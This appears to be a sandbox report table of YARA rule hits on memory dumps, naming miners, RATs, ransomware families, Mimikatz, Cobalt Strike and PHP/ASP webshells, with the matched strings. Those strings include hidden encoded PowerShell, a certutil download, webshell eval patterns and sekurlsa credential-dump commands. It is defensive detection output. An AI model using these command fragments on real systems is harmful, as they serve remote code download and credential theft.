00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6349431685.00000197A36F1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x27498:$s1: stratum+tcp:// 0x280b4:$s1: stratum+tcp://
00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3211c:$s1: stratum+tcp://
00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	APT9002Strings	9002 Identifying Strings	Seth Hardy	0x4e86:$: %%TEMP%%\%s_p.ax
00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xa6f2:$sa2: -EncodedCommand 0xa6e3:$sb2: -window hidden 0x19bb5:$sc1: -nop 0x19bc6:$sd1: -noni
00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x9789:$cUp: Upload failed! [Remote error code: 0x9869:$GDGSYDLYR: GDGSYDLYR_%
00000024.00000003.6340510692.00000197A4B3C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1ce01:$opbs73: eval(str_rot13( 0x6525:$php_short: <? 0xf324:$php_short: <? 0x1f6db:$php_short: <? 0x33597:$php_short: <? 0x33ae7:$php_short: <? 0x37c06:$php_short: <? 0x6525:$php_new1: <?=$
00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3111c:$s1: stratum+tcp://
00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x82eb:$s1: stratum+tcp:// 0x2752e:$s1: stratum+tcp://
00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x29107:$s1: stratum+tcp:// 0x2dc08:$s1: stratum+tcp://
00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x1c1e0:$s2: sekurlsa::wdigest 0x1c111:$s6: sekurlsa::livessp 0x1c156:$s9: sekurlsa::process 0x1c19b:$s12: sekurlsa::tickets 0x1c0cc:$s15: sekurlsa::credman
00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x1ad4b:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1af5b:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1ad4b:$c1: Elevation:Administrator!new: 0x1af5b:$c1: Elevation:Administrator!new: 0x1acf2:$c6: ConsentPromptBehaviorAdmin 0x1af02:$c6: ConsentPromptBehaviorAdmin
00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x2541b:$a1: certutil -decode
00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6332385174.00000197A4180000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xd5e:$opbs48: se'.(32*2) 0x179f:$php_short: <? 0x184cc:$php_short: <? 0x179f:$php_new2: <?php
00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x23c95:$new_php2: <?php 0x77af:$dynamic3: $U\xBF(' 0x2243e:$gen_bit_sus11: "cmd.exe 0x23085:$gen_bit_sus11: "cmd.exe 0x242d8:$gen_bit_sus12: %comspec% 0x23ca0:$gen_bit_sus46: shell_ 0x2a319:$gen_bit_sus47: Shell 0x2baa9:$gen_bit_sus47: Shell 0x5eab:$gen_bit_sus62: Cyber 0x5ed6:$gen_bit_sus62: Cyber 0x23c7b:$gen_much_sus8: WebShell 0x26a18:$gen_much_sus15: AntiVirus 0x2713c:$gen_much_sus15: AntiVirus 0x27f65:$gen_much_sus15: antivirus 0x28042:$gen_much_sus15: antivirus 0x28056:$gen_much_sus15: antivirus 0x2d83f:$gen_much_sus15: Antivirus 0x23c57:$gen_much_sus18: "unsafe 0x24600:$gen_much_sus24: exploit 0x227f0:$gen_much_sus25: Exploit 0x22ab1:$gen_much_sus25: Exploit
00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x23c3e:$payload_and_input1: eval(request. 0x23c3c:$tagasp_short1: <%e 0x23c61:$tagasp_short2: %> 0x23c3c:$tagasp_long13: <%ev 0x2a243:$jsp4: public 0x2a2a1:$jsp4: public
00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0xe4ef:$substring: AAAAYInlM 0xe4eb:$pattern1: /OiCAAAAYInlM
00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x9164:$s1: .CreateObject("WScript.Shell") 0x2fbee:$s1: .CreateObject("WScript.Shell") 0x2c17d:$p1: powershell.exe 0x2c1d3:$p1: powershell.exe 0x39fb8:$p1: powershell.exe 0x2c1a0:$p2: -ExecutionPolicy Bypass 0x2c1f6:$p2: -ExecutionPolicy Bypass 0xe4c7:$p3: [System.Convert]::FromBase64String(
00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x175a4:$s1: powershell.exe -nop -w hidden -e 0x1640a:$s2: Call Shell( 0x17794:$s3: Sub Workbook_Open()
00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x3aa7:$n1: file:// 0x255cd:$n1: file:// 0x3f3f:$ax2: 5.153.58.45
00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x15c42:$s1: stratum+tcp://
00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1963d:$s1: stratum+tcp://
00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6356649431.00000197A36F1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x138b6:$s1: stratum+tcp://
00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x82eb:$s1: stratum+tcp:// 0x2752e:$s1: stratum+tcp://
00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x1046d:$s4: sekurlsa::kerberos
00000024.00000003.6300924417.00000197A4314000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x82eb:$s1: stratum+tcp:// 0x2752e:$s1: stratum+tcp://
00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x243e6:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x35bcc:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x35bee:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xc8fc:$s1: stratum+tcp://
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x28019:$: OnlineTime= 0x28057:$: clientpath= 0x28066:$: serverpath=
00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1ce01:$opbs73: eval(str_rot13( 0x6525:$php_short: <? 0xf324:$php_short: <? 0x1f6db:$php_short: <? 0x33597:$php_short: <? 0x33ae7:$php_short: <? 0x37c06:$php_short: <? 0x6525:$php_new1: <?=$
00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6354837161.00000197A4180000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xd5e:$opbs48: se'.(32*2) 0x179f:$php_short: <? 0x184cc:$php_short: <? 0x179f:$php_new2: <?php
00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1c1ea:$s05: fce8890000006089e531d2648b52308b
00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0xdd78:$enc_eval1: \x65\x76\x61\x6c\x28 0xdd78:$enc_eval2: \x65\x76\x61\x6c\x28 0x5676:$php_short: <? 0xc9ee:$php_short: <? 0xca79:$php_short: <? 0xcb04:$php_short: <? 0xfede:$php_short: <? 0x10d31:$php_short: <? 0x342da:$php_short: <? 0x3530f:$php_short: <? 0x36ab7:$php_short: <? 0x3a253:$php_short: <? 0x36ab7:$php_new2: <?php
00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x36ab7:$new_php2: <?php 0x363c2:$dynamic3: $_server[base64_decode(' 0xce4c:$gen_bit_sus11: "cmd.exe 0xced8:$gen_bit_sus11: "cmd.exe 0xcfef:$gen_bit_sus11: "cmd.exe 0xfdcb:$gen_bit_sus11: "cmd.exe 0x1ed35:$gen_bit_sus47: Shell 0x2e9d3:$gen_bit_sus47: Shell 0x212fd:$gen_bit_sus50: bypass 0x3621e:$gen_bit_sus50: bypass 0x36458:$gen_bit_sus59: 'cmd' 0x1dae3:$gen_bit_sus60: "execute" 0x1db1a:$gen_bit_sus60: "execute" 0x1c0ec:$gen_bit_sus62: Cyber 0x1c18c:$gen_bit_sus62: Cyber 0x34c4a:$gen_bit_sus69: $cmd 0xe1be:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x35289:$gen_much_sus8: WebShell 0x35525:$gen_much_sus8: Webshell 0x36409:$gen_much_sus8: Webshell
00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xdd78:$opbs77: \x65\x76\x61\x6c\x28 0x5676:$php_short: <? 0xc9ee:$php_short: <? 0xca79:$php_short: <? 0xcb04:$php_short: <? 0xfede:$php_short: <? 0x10d31:$php_short: <? 0x342da:$php_short: <? 0x3530f:$php_short: <? 0x36ab7:$php_short: <? 0x3a253:$php_short: <? 0x36ab7:$php_new2: <?php
00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x2f5af:$a: Cookies: Sym1.0 0x2f550:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x138b6:$s1: stratum+tcp://
00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x2ff92:$a: XTREME 0x2ffa4:$a: XTREME 0x2ffa4:$b: XTREMEBINDER
00000024.00000003.6350988033.00000197A3FA2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2be:$s1: stratum+tcp://
00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x429d9:$payload4: eval(gzuncompress(base64_decode 0x27a1a:$php_short: <? 0x27a83:$php_short: <? 0x27aec:$php_short: <? 0x27b55:$php_short: <? 0x27bbe:$php_short: <? 0x2c093:$php_short: <? 0x30d39:$php_short: <? 0x50b28:$php_short: <? 0x27a1a:$php_new2: <?php 0x27a83:$php_new2: <?php 0x27aec:$php_new2: <?php 0x27b55:$php_new2: <?php 0x27bbe:$php_new2: <?php
00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x33ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x345fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x34b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x34b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x11b39:$one6: Shell Environ$("COMSPEC") & " /c
00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2abc1:$s1: stratum+tcp:// 0x2ac01:$s1: stratum+tcp://
00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6314037891.00000197A4314000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x27f53:$xo1: Ik~mhhe+1*4
00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0xff95:$xo1: Ik~mhhe+1*4
00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x3b8ac:$: odhyrfjcnfkdtslt
00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0xd67e:$payload7: eval(base64_decode( 0xd669:$php_short: <? 0xe4dd:$php_short: <? 0x26827:$php_short: <? 0xd669:$php_new2: <?php 0xe4dd:$php_new2: <?php
00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xd734:$s1: stratum+tcp://
00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x333a3:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x33bae:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x33bbe:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x12e1d:$s1: WScript.Shell").run
00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1f5a7:$s1: stratum+tcp:// 0x21897:$s1: stratum+tcp://
00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x21ed4:$s1: Stratum notify: invalid Merkle branch
00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000024.00000003.6339772836.00000197A3E9A000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xc77e:$s1: stratum+tcp://
00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xf0c5:$a5: certutil -urlcache -split -f http
00000024.00000003.6330651040.00000197A36F1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x34aac:$s1: stratum+tcp://
